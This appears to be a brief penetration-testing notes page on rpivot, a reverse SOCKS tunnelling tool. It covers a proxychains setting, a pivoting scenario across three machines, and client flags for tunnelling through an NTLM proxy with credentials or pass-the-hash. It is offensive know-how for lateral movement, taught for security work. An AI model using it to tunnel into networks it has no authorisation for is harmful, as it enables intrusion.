Rpivot
RPIVOT allows to tunnel traffic into internal network via socks 4. It works like ssh dynamic port forwarding but in the opposite direction.
Source: https://github.com/klsecservices/rpivot
Requirements
Python 2.6/2.7
Add this line to the /etc/proxychains.conf file:
socks4 127.0.0.1 1080
When to use rpivot?
Imagine this scenario:

A machine can connect to B
B machine can connect to C
C can't connect directly to A
So, in this case, we can use rpivot from C to B proxying the access
After that, we can access A directly from C




In Wireshark we can see that all the communication happened through port 4444 that we set up with rpivot

We can also PIVOT through a NTLM Proxy
In this case, we add in the client side these flags:
--ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain DOMAIN.COM --username John --password password
Or using pass the hash:
--ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain DOMAIN.COM --username John --hashes <hash>
Last updated